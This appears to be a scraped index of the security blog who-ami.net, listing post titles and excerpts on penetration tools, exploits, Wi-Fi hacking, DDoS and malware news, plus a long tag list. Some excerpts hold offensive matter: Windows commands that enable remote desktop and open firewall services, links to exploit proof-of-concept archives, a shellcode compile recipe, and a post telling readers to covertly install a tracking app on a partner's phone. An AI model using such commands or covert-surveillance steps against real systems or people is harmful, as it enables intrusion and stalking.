[github.com/MalwareReverseBrasil/malwaresearch.git] optional arguments: -h, --help show this help message and exit -f Sample, --find Sample Enter your search via MD5, SHA1, SHA256 or an Common Signature name. -d Hash, --download Hash - [Brute Force SMB Share and get shell](https://who-ami.net/brute-force-smb-share-and-get-shell/) - Brute Force SMB Share and get shell Introduce SMB: Short for Server Message Block, SMB is a common network communications method used on Microsoft operating systems allowing those computers to communicate with other SMB computers. Linux and Unix computers can find other computers that respond to SMB requests using the findsmb command. Penetration Testing - [Lock and unlock your computer with a USB drive](https://who-ami.net/lock-and-unlock-your-computer-with-a-usb-drive/) - Lock and unlock your computer with a USB drive If you prevent access to your computer with just a password, you are missing out on an alternate (and more secure) way to lock down your computer. Predator, a free Windows program, turns your USB drive into a key that locks your computer when it’s removed. - [Enable USB Key Authentication On Facebook](https://who-ami.net/enable-usb-key-authentication-on-facebook/) - Enable USB Key Authentication On Facebook Facebook has added support for USB key two-factor authentication to improve account security. Here are the steps to enable USB key authentication on your Facebook account: Step 1: Go to the Security settings page and expand the Logins Approval section. Step 2: In the Security Keys section, click the Add Key - [Hydra 8.5](https://who-ami.net/hydra-8-5/) - Network Logon Cracker A very fast network logon cracker which support many different services. This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system. There are already several login hacker tools available, - [Bypass Wifi Mac Filter on Android](https://who-ami.net/bypass-wifi-mac-filter-on-android/) - What is spoofing? In the context of network security, a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data, thereby gaining an illegitimate advantage. Spoofing MAC Address on Android Devices In actuality, MAC address is embedded in our hardware only during its manufacturing, but thanks to - [How CAPTCHA Works ?](https://who-ami.net/how-captcha-works/) - How CAPTCHA Works ? You’ve probably seen little tests scattered around the internet when you’re trying to post a comment, creating an account or buy something. These tests are called CAPTCHA which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test used in computing to - [Hack Wi-Fi on Android](https://who-ami.net/hack-wi-fi-on-android/) - Hack Wi-Fi on Android Here are a few Ways to Hack Wifi on Android that will help you to get complimentary wireless internet by hacking remote system with your established and non-established android with best wifi hacking applications for android, Have you ever got the chance to appear some WiFi hotspot close-by looked by your - [Kali Linux update failed (signature verification)](https://who-ami.net/kali-linux-update-failed-signature-verification/) - APT-GET ERROR SLOVED I recently installed Kali Linux Rolling as main Operating System and ran into a problem. When i try to use apt-get update an error code returned ! An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://archive-10.kali.org/kali kali-rolling InRelease: The following signatures - [Hack And Trace Any Android Phone With A Free Software Remotly](https://who-ami.net/hack-and-trace-any-android-phone-with-a-free-software-remotly/) - Let's Start The trick... STEP 1: First of all go to android market from your Girlfriend,spouse,friends or anyone's phone which you want to spy or download the app mentioned below. STEP 2: Search for a android application named "Touch My life " LZDLfJaxOr4o0AmgCEw/s400/touch.PNG" width="400" border="0" height="231"> STEP 3: Download and install that application on that - [Basics of Kali linux](https://who-ami.net/basics-of-kali-linux/) - Basics of Kali linux (PDF) Kali Linux is preinstalled with over 600 penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security scanners). Kali Linux can run natively when installed on - [Firewall and Reasons Why You Should Use it](https://who-ami.net/firewall-and-reasons-why-you-should-use-it/) - Firewall and Reasons Why You Should Use it We all heard about firewall at some point of time, what are they used for ? Do they stop viruses? Well actually, there is a great chance that you are now using a firewall, if your are running a modern OS on your computer, there is be one built in, - [T-UI Launcher](https://who-ami.net/t-ui-launcher/) - Turns Android Device into Linux Command Line Interface Are you a command line guru, or do you simply want to make your Android device unusable for friends and family, then check out T-UI Launcher app. Unix/Linux users will definitely love this. T-UI Launcher is a free lightweight Android app with a Linux-like CLI (Command - [WPSeku - WordPress Vulnerability Scanner](https://who-ami.net/wpseku-wordpress-vulnerability-scanner/) - WPSeku - WordPress Vulnerability Scanner WordPress is a free and open-source, highly customizable content management system (CMS) that is being used by millions around the world to run blogs and fully functional websites. Because it is the most used CMS out there, there are so many potential WordPress security issues/vulnerabilities to be concerned about. However, - [Most common types of virus](https://who-ami.net/most-common-types-of-virus/) - When the virus is executed, it spreads by copying itself into or over data files, programs, or boot sector of a computer’s hard drive, or potentially anything else writable. To help spread an infection the virus writers use detailed knowledge of security vulnerabilities, zero days, or social engineering to gain access to a host’s computer. - [Joomla Core ( Multiple XSS Vulnerabilities )](https://who-ami.net/joomla-core-multiple-xss-vulnerabilities/) - Multiple XSS Vulnerabilities on Joomla Core Joomla is a free and open-source content management system (CMS) for publishing web content. It is built on a model–view–controller web application framework that can be used independently of the CMS. Joomla is written in PHP, uses object-oriented programming (OOP) techniques (since version 1.5) and software design patterns, - [HoneyPot & HoneyNet](https://who-ami.net/honeypot-honeynet/) - systems and devices, such as the Solaris the Linux the Windows NT the Cisco of Switch and so on. Thus created network environment will look more authentic, but we have a different system platforms to run on top of a different service than as a Linux DNS server, Windows’s webserver or a Solaris Server of - [SQL Vulnerability Scanner (Whitewidow)](https://who-ami.net/sql-vulnerability-scanner-whitewidow/) - SQL Vulnerability Scanner Whitewidow Whitewidow is an open source automated SQL vulnerability scanner, that is capable of running through a file list, or can scrape Google for potential vulnerable websites. It allows automatic file formatting, random user agents, IP addresses, server information, multiple SQL injection syntax, ability to launch sqlmap from the program, and a - [Tools for Ethical Hackers](https://who-ami.net/tools-for-ethical-hackers/) - Hex-Rays IDA FWrapper for IDA [Password Crackers] John The Ripper Aircrack Airsnort RainbowCrack [Packet Sniffers] Wireshark Kismet kismac Tcpdump Ettercap Dsniff Ngrep EtherApe Nmap SSLstrip [Vulnerability Scanners] Nessus Sara QualysGuard SAINT [Web Vulnerability Scanners] Nikito Paros Proxy Webscarab Whisker/libwhisker Burpsuite W3af [Wireless Tools] Kismet Kismac Aircrack Airsnort Cowpatty [Vulnerability Exploitation Tools] Metasploit Framework [Packet - [Web vulnerability scanning modules in Metasploit](https://who-ami.net/web-vulnerability-scanning-modules-in-metasploit/) - Web vulnerability scanning modules in Metasploit Information gathering web server scanning module Module auxiliary/scanner/http/http_version Module auxiliary/scanner/http/open_proxy Module auxiliary/scanner/http/robots_txt Module auxiliary/scanner/http/frontpage_login Module auxiliary/admin/http/tomcat_administration Module auxiliary/admin/http/tomcat_utf8_traversal Module auxiliary/scanner/http/options Module auxiliary/scanner/http/drupal_views_user_enum Module auxiliary/scanner/http/scraper Module auxiliary/scanner/http/svn_scanner Module auxiliary/scanner/http/trace Module auxiliary/scanner/http/vhost_scanner Module auxiliary/scanner/http/webdav_internal_ip Module auxiliary/scanner/http/webdav_scanner Module auxiliary/scanner/http/webdav_website_content File directory scan module Module auxiliary/dos/http/apache_range_dos Module auxiliary/scanner/http/backup_file Module auxiliary/scanner/http/brute_dirs Module - [Windows Kung Fu Command Line](https://who-ami.net/windows-kung-fu-command-line/) - reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable View user on group net localgroup Users net localgroup Administrators search all .doc file dir/s *.doc Start a new CMD shell and (optionally) run a command/executable program start cmd.exe /k notepad.exe Netcat - [Commix v1.9 release](https://who-ami.net/commix-v1-9-release/) - Automated All-in-One OS command injection and exploitation tool Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos (@ancst) that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command - [Best Firewalls For Linux](https://who-ami.net/best-firewalls-for-linux/) - Firewalls For Linux To Protect Your Network Linux is quite possibly the only open-source project that has managed to change the world at a very large scale. It is on your phones as Android, it is on the millions of servers that run the internet itself and also it is even on your home router. - [Open Port Scanning and OS Detection](https://who-ami.net/open-port-scanning-and-os-detection/) - nmap -sV 192.168.0.13 -A -v - [Exploit SQL Injection Using Sqlmap](https://who-ami.net/exploit-sql-injection-using-sqlmap/) - Database: acuart [8 tables] +———–+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | products | | users | +———–+ Now we have a list of tables , we need to get columns so we gonna type : - [DDoS](https://who-ami.net/ddos/) - How Hackers DDoS What is it? A “denial of service” (sometimes called a “distributed denial of service” or DDoS) attack occurs when a system, in this case a web server, receives so many requests at one time that the server resources are overloaded the system simply locks up and shuts down. The goal and result - [Control the Mouse Pointer using your Keyboard in Windows](https://who-ami.net/control-the-mouse-pointer-using-your-keyboard-in-windows/) - Control the Mouse Pointer using your Keyboard in Windows There are certain situations (most commonly a broken mouse) where you want to control your mouse using your keyboard. If you are looking to do the same, you’re exactly at the right place. Read below to know how to move and control your cursor using - [Difference Between Windows 10 S and Windows 10](https://who-ami.net/difference-between-windows-10-s-and-windows-10/) - Difference Between Windows 10 S and Windows 10 What is Windows 10 S and how is it different from regular Windows 10? On May 2nd, Microsoft announced its next chapter in the Windows 10 story – the Windows 10 S. This is a brand new version of Windows 10 that will be available with - [Adobe Flash - Out-of-Bounds Read in Getting TextField Width Exploit (0DAY)](https://who-ami.net/adobe-flash-out-of-bounds-read-in-getting-textfield-width-exploit-0day/) - Author Google Security Research Risk [ Security Risk Medium ] 0day-ID 0day-ID-27796 Category dos / poc Date add 17-05-2017 CVE CVE-2017-3064 Platform multiple Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1211 The attached swf causes an out-of-bounds read in getting the width of a TextField. Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42019.zip Source - [Pybelt](https://who-ami.net/pybelt/) - SQL Injection scanning made easy, just provide a URL and watch it work You can either clone the repository git clone https://github.com/ekultek/pybelt.git or download the latest release as a zip/tar ball here Once you have the program installed cd into the directory and run the following command: pip install -r requirements.txt This will install all - [Adobe Flash - Margin Handling Heap Corruption Exploit](https://who-ami.net/adobe-flash-margin-handling-heap-corruption-exploit/) - Adobe Flash - Margin Handling Heap Corruption Exploit Author Google Security Research Risk [ Security Risk Medium ] 0day-ID 0day-ID-27795 Category dos / poc Date add 17-05-2017 CVE CVE-2017-3061 Platform multiple Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1174 The attached fuzzed swf causes a crash due to heap corruption when processing the margins of a rich text field. Proof of - [Secure Your E-Mail Account](https://who-ami.net/secure-your-e-mail-account/) - Secure Your E-Mail Account How To Secure Your E-Mail Account ? E-mail is one of the most widely used Internet services today. The services which are generally used in the e-mail Infrastructure are Simple Mail Transfer Protocol (SMTP) and Post Office Protocol version 3 (POP3) or Internet Message Access Protocol (IMAP). The client communicates with - [NETATTACK 2](https://who-ami.net/netattack-2/) - LINUX! nmap argparse (Python) scapy (Python) iw Download - [VEGA (web app vulnerability scanner)](https://who-ami.net/vega-web-app-vulnerability-scanner/) - If you look at HTML / CSS a bit, you’ll be able to edit it more conveniently. This also applies to module configurations. VEGA supports Javascript-based modules, and if you have any modules you need, you can write them in JS. This is a very attractive tool in this regard. Installing Download VEGA 2.Choose your download - [Exploit Windows Machine (MS-17-10)](https://who-ami.net/exploit-windows-machine-ms-17-10/) - Exploit Windows Machine Shadow Brokers shocked the world once again leaked a confidential document, which contains a number of beautifully Windows remote exploits that can cover a large number of Windows servers, Windows servers almost all across the board overnight exposure to risk. What is MS-17-10? Remote code execution vulnerabilities exist in the way - [Linux Terminal Command Reference list](https://who-ami.net/linux-terminal-command-reference-list/) - cal – Show this month’s calendar uptime – Show current uptime w – Display who is online whoami – Who you are logged in as finger user – Display information about user uname -a – Show kernel information cat /proc/cpuinfo – CPU information cat /proc/meminfo – Memory information df – Show disk usage du – - [Windows x32 / Windows x64 - cmd.exe Shellcode](https://who-ami.net/windows-x32-windows-x64-cmd-exe-shellcode/) - Windows x32 / Windows x64 - cmd.exe Shellcode Author Filippo Bersani Risk [ Security Risk High ] 0day-ID 0day-ID-27788 Category shellcode Date add 17-05-2017 Platform windows ;Full tutorial: https://www.zinzloun.info [#Windows CMD shellcode] ;COMPILE: ;nasm.exe [-f win32] dynamic.asm -o dynamic.obj ;SKIP -f win32 to create the .obj file to extract eventually the hex code ;then execute: - [Linux kernel flaw can local privilege escalation](https://who-ami.net/linux-kernel-flaw-can-local-privilege-escalation/) - Linux kernel flaw can local privilege escalation CVE-2017-2636 An old Linux kernel vulnerability was exposed! The vulnerabilities can be traced back to 2009, linux distributions affected include Red Hat, Debian, Fedora, OpenSUSE and Ubuntu. The number of Linux vulnerability CVE-2017-2636 , in accordance with CVSS v3 standard vulnerability score of 7.8 points. Vulnerability in - [Trolling Noobs Asking to Hack Whatsapp, Facebook, Gmail...](https://who-ami.net/trolling-noobs-asking-to-hack-whatsapp-facebook-gmail/) - Trolling Noobs Asking to Hack Whatsapp, Facebook, Gmail... When I get noobs asking me to give them hacking software for Whatsapp, Facebook, Gmail etc it makes me want to commit some form of major attrocity, the only way I can make myself feel a little better in my response is to do some trolling of - [Nmap Web Version](https://who-ami.net/nmap-web-version/) - Nmap Web Version Rainmap is a web-based application that allows users to create, configure and run Nmap scans from within their browser. A wide range of Nmap options is available, though users only need to specify the targets they want scanned, and the default options will be adequate in most cases. Rainmap aims to simplify - [Enable Hidden Dark Theme Of Windows 10](https://who-ami.net/enable-hidden-dark-theme-of-windows-10/) - Enable Hidden Dark Theme Of Windows 10 To get that dark theme you just need to follow the below steps that how really your system Windows 10 hiding the dark theme from you. At the time of your Win 10 purchase you were not being told all these secrets and today the reason of sharing - [Major Update of Acunetix Online](https://who-ami.net/major-update-of-acunetix-online/) - Major Update of Acunetix Online Acunetix Online has undergone a mammoth update, now enjoying all the features and benefits found in Acunetix On Premise, including: Integrated vulnerability management, greater manageability of threats and targets and the integration of popular WAFs and Issue Tracking systems. Acunetix Online also features a brand new UI for greater - [Researchers found yet another Cyberattack using NSA hacking tools](https://who-ami.net/researchers-found-yet-another-cyberattack-using-nsa-hacking-tools/) - Researchers found yet another Cyberattack using NSA hacking tools Cybersecurity researchers have identified a second ongoing global cyber attack that has quietly hijacked hundreds of thousands of computers around the world, including many in the United States, for a massive cryptocurrency mining operation. While investigating the WannaCry ransomware attacks, researchers at the cyber security firm - [Hydra v8.5 & v8.6](https://who-ami.net/hydra-v8-5-v8-6/) - Hydra v8.5 & v8.6 THC-Hydra is a very fast (multi-threaded) network logon cracker which supports many different services: afp, cisco, cisco-enable, cvs, firebird, ftp, http-get, http-head, http-proxy, https-get, https-head, https-form-get, https-form-post, icq, imap, imap-ntlm, ldap2, ldap3, mssql, mysql, ncp, nntp, oracle-listener, pcanywhere, pcnfs, pop3, pop3-ntlm, postgres, rexec, rlogin, rsh, sapr3, sip, smb, smbnt, smtp-auth, smtp-auth-ntlm, - [WannaCry decryption tool has been released!](https://who-ami.net/wannacry-decryption-tool-has-been-released/) - WannaCry decryption tool has been released! The WannaCry ransomware has infected thousands of computer systems around the world, but Adrien Guinet a security researcher of Quarkslab, has found a way to recover the unknown encryption keys used by the ransomware. Adrien said that in order to retrieve the keys, your computer must not have been - [WannaCry Ransomware Is On Windows 10 Now !](https://who-ami.net/wannacry-ransomware-is-on-windows-10-now/) - Security researchers are still busy developing fixes for the Wannacry ransomware. Well, Windows was affected massively across the world. Researchers at RiskSense have successfully managed to port the WannaCry exploit to infect Windows 10 as well. The world has just faced a huge ransomware attack. Wannacry Ransomware attack already hit companies across the world. Well, - [PHP Exploitation Codes](https://who-ami.net/php-exploitation-codes/) - PHP Exploitation Codes Command Execution exec - Returns last line of commands output passthru - Passes commands output directly to the browser system - Passes commands output directly to the browser and returns last line shell_exec - Returns commands output `` (backticks) - Same as shell_exec() popen - Opens read or write pipe to process - [WordPress 4.6 RCE Vulnearbility (CVE-2016-10033)](https://who-ami.net/wordpress-4-6-rce-vulnearbility-cve-2016-10033/) - WordPress 4.6 RCE Vulnearbility WordPress (WP) is a free and open source CMS for managing a website, blog, and other content on the Internet that was first released on May 27, 2003. Today, WordPress is used on over 75 million sites and is still based on PHP and MySQL and can either be installed ## Pages - [Home](https://who-ami.net/) - WE WANT YOU TO KNOW ! In all our tutorials we us our own routers, servers, websites and other resources, and it not contain any illegal activity. We know that it is impossible to defend yourself against hackers without knowing how they proceed. We want to raise security awareness and inform our readers about how - [Privacy Policy](https://who-ami.net/privacy-policy/) - Read it for me Your privacy is critically important to us. At Automatic, we have a few fundamental principles: We don’t ask you for personal information unless we truly need it. (We can’t stand services that ask you for things like your gender or income level for no apparent reason.) We don’t share your personal - [About](https://who-ami.net/about/) - WHO-AMI is a security and information community. Read it for me We are committed to sharing technical security and information items by focusing on security incidents in industry and everyday life. In our articles you will find: penetration of internal and external network, mobile, webapps, business, and security management and other security issues. You will - [Contact](https://who-ami.net/contact-2/) - Name * Email * Message * Submit TELEGRAM : @skyn3t_08 - [Donations](https://who-ami.net/donations/) - Do you think our work deserves to be rewarded ? All donations are appreciated. ## Categories - [Linux](https://who-ami.net/category/linux/) - What you will find in this section ? In this section you will find all about Linux - [News](https://who-ami.net/category/cyber-security-news/) - In this section we will find the latest news in the field of cyber security. “If you don’t read the newspaper, you’re uninformed. If you do, you’re misinformed.” - [Video](https://who-ami.net/category/video/) - In this section we will find video tutorials but also useful videos about this field - [Tutorials](https://who-ami.net/category/tutorials/) - This section is about how to install, configure and use tools. But we will also find the basis of some programming languages. How to create a phishing page and much more… - [Tools](https://who-ami.net/category/tools/) - In this section we will see the most powerful and used tools. - [Tricks](https://who-ami.net/category/trick/) - In this section we will find some useful tricks - [What is](https://who-ami.net/category/what-is/) - In this section you will find all your questions answered ## Tags - [Penetration Tester](https://who-ami.net/tag/penetration-tester/) - [pentester](https://who-ami.net/tag/pentester/) - [blackhat](https://who-ami.net/tag/blackhat/) - [grayhat](https://who-ami.net/tag/grayhat/) - [hackers](https://who-ami.net/tag/hackers/) - [whitehat](https://who-ami.net/tag/whitehat/) - [backbox](https://who-ami.net/tag/backbox/) - [blackarch](https://who-ami.net/tag/blackarch/) - [kali](https://who-ami.net/tag/kali/) - [knoppix](https://who-ami.net/tag/knoppix/) - [parrot](https://who-ami.net/tag/parrot/) - [collect system](https://who-ami.net/tag/collect-system/) - [commands](https://who-ami.net/tag/commands/) - [hardware](https://who-ami.net/tag/hardware/) - [info-commands](https://who-ami.net/tag/info-commands/) - [information](https://who-ami.net/tag/information/) - [systeminfo](https://who-ami.net/tag/systeminfo/) - [LUKS](https://who-ami.net/tag/luks/) - [press](https://who-ami.net/tag/press/) - [single key](https://who-ami.net/tag/single-key/) - [vulnerability](https://who-ami.net/tag/vulnerability/) - [security](https://who-ami.net/tag/security/) - [tips](https://who-ami.net/tag/tips/) - [tricks](https://who-ami.net/tag/tricks/) - [attacks](https://who-ami.net/tag/attacks/) - [brute-force](https://who-ami.net/tag/brute-force/) - [dictionary](https://who-ami.net/tag/dictionary/) - [ssh](https://who-ami.net/tag/ssh/) - [bootable](https://who-ami.net/tag/bootable/) - [bootableusb](https://who-ami.net/tag/bootableusb/) - [liveusb](https://who-ami.net/tag/liveusb/) - [usb](https://who-ami.net/tag/usb/) - [attack](https://who-ami.net/tag/attack/) - [Buffer](https://who-ami.net/tag/buffer/) - [overflow](https://who-ami.net/tag/overflow/) - [sql](https://who-ami.net/tag/sql/) - [sql-injection](https://who-ami.net/tag/sql-injection/) - [web](https://who-ami.net/tag/web/) - [webattack](https://who-ami.net/tag/webattack/) - [android](https://who-ami.net/tag/android/) - [hack](https://who-ami.net/tag/hack/) - [msfconsole](https://who-ami.net/tag/msfconsole/) - [msfvenom](https://who-ami.net/tag/msfvenom/) - [exploit](https://who-ami.net/tag/exploit/) - [exploit-db](https://who-ami.net/tag/exploit-db/) - [windows](https://who-ami.net/tag/windows/) - [hacks](https://who-ami.net/tag/hacks/) - [prorat](https://who-ami.net/tag/prorat/) - [rat](https://who-ami.net/tag/rat/) - [linux](https://who-ami.net/tag/linux/) - [tools](https://who-ami.net/tag/tools/) - [nmap](https://who-ami.net/tag/nmap/) - [scanning](https://who-ami.net/tag/scanning/) - [metasploit](https://who-ami.net/tag/metasploit/) - [crack](https://who-ami.net/tag/crack/) - [password](https://who-ami.net/tag/password/) - [wi-fi](https://who-ami.net/tag/wi-fi/) - [wireless](https://who-ami.net/tag/wireless/) - [aircrack](https://who-ami.net/tag/aircrack/) - [aircrack-ng](https://who-ami.net/tag/aircrack-ng/) - [airmon-ng](https://who-ami.net/tag/airmon-ng/) - [wifi](https://who-ami.net/tag/wifi/) - [cracking](https://who-ami.net/tag/cracking/) - [programming](https://who-ami.net/tag/programming/) - [encryption](https://who-ami.net/tag/encryption/) - [java](https://who-ami.net/tag/java/) - [javascript](https://who-ami.net/tag/javascript/) - [python](https://who-ami.net/tag/python/) - [ruby](https://who-ami.net/tag/ruby/) - [ubuntu](https://who-ami.net/tag/ubuntu/) - [hacking](https://who-ami.net/tag/hacking/) - [reaver](https://who-ami.net/tag/reaver/) - [wash](https://who-ami.net/tag/wash/) - [audit](https://who-ami.net/tag/audit/) - [hacker](https://who-ami.net/tag/hacker/) - [injector](https://who-ami.net/tag/injector/) - [powershell](https://who-ami.net/tag/powershell/) - [engines](https://who-ami.net/tag/engines/) - [search](https://who-ami.net/tag/search/) - [script](https://who-ami.net/tag/script/) - [Location](https://who-ami.net/tag/location/) - [beef](https://who-ami.net/tag/beef/) - [browser](https://who-ami.net/tag/browser/) - [bruteforce](https://who-ami.net/tag/bruteforce/) - [pentest](https://who-ami.net/tag/pentest/) - [smb](https://who-ami.net/tag/smb/) - [Dork](https://who-ami.net/tag/dork/) - [MySQL](https://who-ami.net/tag/mysql/) - [Oracle](https://who-ami.net/tag/oracle/) - [postgreSQL](https://who-ami.net/tag/postgresql/) - [scanner](https://who-ami.net/tag/scanner/) - [scanners](https://who-ami.net/tag/scanners/) - [iptables](https://who-ami.net/tag/iptables/) - [hacked](https://who-ami.net/tag/hacked/) - [download](https://who-ami.net/tag/download/) - [transfer](https://who-ami.net/tag/transfer/) - [upload](https://who-ami.net/tag/upload/) - [Adobe](https://who-ami.net/tag/adobe/) - [flash](https://who-ami.net/tag/flash/) - [teamviewer](https://who-ami.net/tag/teamviewer/) - [user](https://who-ami.net/tag/user/) - [root](https://who-ami.net/tag/root/) - [mac](https://who-ami.net/tag/mac/) - [Darknet](https://who-ami.net/tag/darknet/) - [Tor](https://who-ami.net/tag/tor/) - [Hidden](https://who-ami.net/tag/hidden/) - [hakcers](https://who-ami.net/tag/hakcers/) - [website](https://who-ami.net/tag/website/) - [Popular](https://who-ami.net/tag/popular/) - [Websites](https://who-ami.net/tag/websites/) - [Malicious](https://who-ami.net/tag/malicious/) - [System](https://who-ami.net/tag/system/) - [Pendrive](https://who-ami.net/tag/pendrive/) - [corrupt](https://who-ami.net/tag/corrupt/) - [fix](https://who-ami.net/tag/fix/) - [SD card](https://who-ami.net/tag/sd-card/) - [Antivirus](https://who-ami.net/tag/antivirus/) - [access](https://who-ami.net/tag/access/) - [codes](https://who-ami.net/tag/codes/) - [software](https://who-ami.net/tag/software/) - [penetration](https://who-ami.net/tag/penetration/) - [skill](https://who-ami.net/tag/skill/) - [testing](https://who-ami.net/tag/testing/) - [emails](https://who-ami.net/tag/emails/) - [phishing](https://who-ami.net/tag/phishing/) - [Malware](https://who-ami.net/tag/malware/) - [spamming](https://who-ami.net/tag/spamming/) - [scripts](https://who-ami.net/tag/scripts/) - [trojans](https://who-ami.net/tag/trojans/) - [network](https://who-ami.net/tag/network/) - [traffic](https://who-ami.net/tag/traffic/) - [command](https://who-ami.net/tag/command/) - [shell](https://who-ami.net/tag/shell/) - [encrypted](https://who-ami.net/tag/encrypted/) - [man-in-the-middle](https://who-ami.net/tag/man-in-the-middle/) - [penetration testing](https://who-ami.net/tag/penetration-testing/) - [monitor](https://who-ami.net/tag/monitor/) - [Decryptor](https://who-ami.net/tag/decryptor/) - [Ransomware](https://who-ami.net/tag/ransomware/) - [zeroday](https://who-ami.net/tag/zeroday/) - [kali-linux](https://who-ami.net/tag/kali-linux/) - [dorking](https://who-ami.net/tag/dorking/) - [google](https://who-ami.net/tag/google/) - [antisniffing](https://who-ami.net/tag/antisniffing/) - [sniff](https://who-ami.net/tag/sniff/) - [sniffing attacks](https://who-ami.net/tag/sniffing-attacks/) - [putty](https://who-ami.net/tag/putty/) - [SNMP](https://who-ami.net/tag/snmp/) - [Data](https://who-ami.net/tag/data/) - [Microsoft](https://who-ami.net/tag/microsoft/) - [Remote Code Execution](https://who-ami.net/tag/remote-code-execution/) - [Vulnearbility](https://who-ami.net/tag/vulnearbility/) - [WordPress](https://who-ami.net/tag/wordpress/) - [admin](https://who-ami.net/tag/admin/) - [ARP](https://who-ami.net/tag/arp/) - [ARP spoofs](https://who-ami.net/tag/arp-spoofs/) - [tool](https://who-ami.net/tag/tool/) - [compromise](https://who-ami.net/tag/compromise/) - [Eternalblue](https://who-ami.net/tag/eternalblue/) - [ETERNALBLUE & DOUBLEPULSAR](https://who-ami.net/tag/eternalblue-doublepulsar/) - [Eternalblue_Doublepulsar](https://who-ami.net/tag/eternalblue_doublepulsar/) - [EternalBlue&DoublePulsar](https://who-ami.net/tag/eternalbluedoublepulsar/) - [exploit-windows](https://who-ami.net/tag/exploit-windows/) - [exploitation](https://who-ami.net/tag/exploitation/) - [exploits](https://who-ami.net/tag/exploits/) - [exploitwindows](https://who-ami.net/tag/exploitwindows/) - [framework](https://who-ami.net/tag/framework/) - [MS17-010](https://who-ami.net/tag/ms17-010/) - [NSA](https://who-ami.net/tag/nsa/) - [NSAHackTool](https://who-ami.net/tag/nsahacktool/) - [windows-exploit](https://who-ami.net/tag/windows-exploit/) - [windows-hack](https://who-ami.net/tag/windows-hack/) - [windows-hacking](https://who-ami.net/tag/windows-hacking/) - [windows-vulnerability](https://who-ami.net/tag/windows-vulnerability/) - [wxploit-windows](https://who-ami.net/tag/wxploit-windows/) - [Bluetooth](https://who-ami.net/tag/bluetooth/) - [Secret Hack](https://who-ami.net/tag/secret-hack/) - [CloudBust](https://who-ami.net/tag/cloudbust/) - [DDoS](https://who-ami.net/tag/ddos/) - [flood](https://who-ami.net/tag/flood/) - [HTTP Flood](https://who-ami.net/tag/http-flood/) - [SYN](https://who-ami.net/tag/syn/) - [TCP](https://who-ami.net/tag/tcp/) - [TCP SYN](https://who-ami.net/tag/tcp-syn/) - [TCP SYN Flood](https://who-ami.net/tag/tcp-syn-flood/) - [UDP](https://who-ami.net/tag/udp/) - [UDP Flood](https://who-ami.net/tag/udp-flood/) - [WarChild](https://who-ami.net/tag/warchild/) - [Control](https://who-ami.net/tag/control/) - [full control](https://who-ami.net/tag/full-control/) - [gain full control](https://who-ami.net/tag/gain-full-control/) - [Intel](https://who-ami.net/tag/intel/) - [Intel chips](https://who-ami.net/tag/intel-chips/) - [remotely](https://who-ami.net/tag/remotely/) - [Facebook](https://who-ami.net/tag/facebook/) - [hiding](https://who-ami.net/tag/hiding/) - [inbox](https://who-ami.net/tag/inbox/) - [messages](https://who-ami.net/tag/messages/) - [secret](https://who-ami.net/tag/secret/) - [cyberattacks](https://who-ami.net/tag/cyberattacks/) - [infected](https://who-ami.net/tag/infected/) - [virus](https://who-ami.net/tag/virus/) - [virus attack](https://who-ami.net/tag/virus-attack/) - [WannaCry](https://who-ami.net/tag/wannacry/) - [hacking tool](https://who-ami.net/tag/hacking-tool/) - [MITM](https://who-ami.net/tag/mitm/) - [MITMf](https://who-ami.net/tag/mitmf/) - [Code](https://who-ami.net/tag/code/) - [CVE-2017-0290](https://who-ami.net/tag/cve-2017-0290/) - [Execution](https://who-ami.net/tag/execution/) - [Remote](https://who-ami.net/tag/remote/) - [Antivirus evasion](https://who-ami.net/tag/antivirus-evasion/) - [detection](https://who-ami.net/tag/detection/) - [evasion](https://who-ami.net/tag/evasion/) - [Veil](https://who-ami.net/tag/veil/) - [Veil 3.0](https://who-ami.net/tag/veil-3-0/) - [login](https://who-ami.net/tag/login/) - [Port](https://who-ami.net/tag/port/) - [Analysis](https://who-ami.net/tag/analysis/) - [analysis toolkit](https://who-ami.net/tag/analysis-toolkit/) - [Pandas](https://who-ami.net/tag/pandas/) - [Pandas 0.20.1](https://who-ami.net/tag/pandas-0-20-1/) - [Toolkit](https://who-ami.net/tag/toolkit/) - [removal](https://who-ami.net/tag/removal/) - [removal toolkit](https://who-ami.net/tag/removal-toolkit/) - [Unicorn](https://who-ami.net/tag/unicorn/) - [Brute-Forcing](https://who-ami.net/tag/brute-forcing/) - [BruteSpray](https://who-ami.net/tag/brutespray/) - [Medusa](https://who-ami.net/tag/medusa/) - [Compression](https://who-ami.net/tag/compression/) - [File Commands](https://who-ami.net/tag/file-commands/) - [Keyboard Shortcuts](https://who-ami.net/tag/keyboard-shortcuts/) - [Printing](https://who-ami.net/tag/printing/) - [Searching](https://who-ami.net/tag/searching/) - [System Info](https://who-ami.net/tag/system-info/) - [terminal](https://who-ami.net/tag/terminal/) - [dns2proxy](https://who-ami.net/tag/dns2proxy/) - [Responder](https://who-ami.net/tag/responder/) - [sslstrip2](https://who-ami.net/tag/sslstrip2/) - [Wi-Fi Access](https://who-ami.net/tag/wi-fi-access/) - [WiFi-Pumpkin](https://who-ami.net/tag/wifi-pumpkin/) - [Protect](https://who-ami.net/tag/protect/) - [FakeAP](https://who-ami.net/tag/fakeap/) - [Fluxion](https://who-ami.net/tag/fluxion/) - [hack wifi](https://who-ami.net/tag/hack-wifi/) - [networks](https://who-ami.net/tag/networks/) - [Scan](https://who-ami.net/tag/scan/) - [wifi-hack](https://who-ami.net/tag/wifi-hack/) - [wifihack](https://who-ami.net/tag/wifihack/) - [WPA](https://who-ami.net/tag/wpa/) - [Movie](https://who-ami.net/tag/movie/) - [Angry Ip](https://who-ami.net/tag/angry-ip/) - [Camera 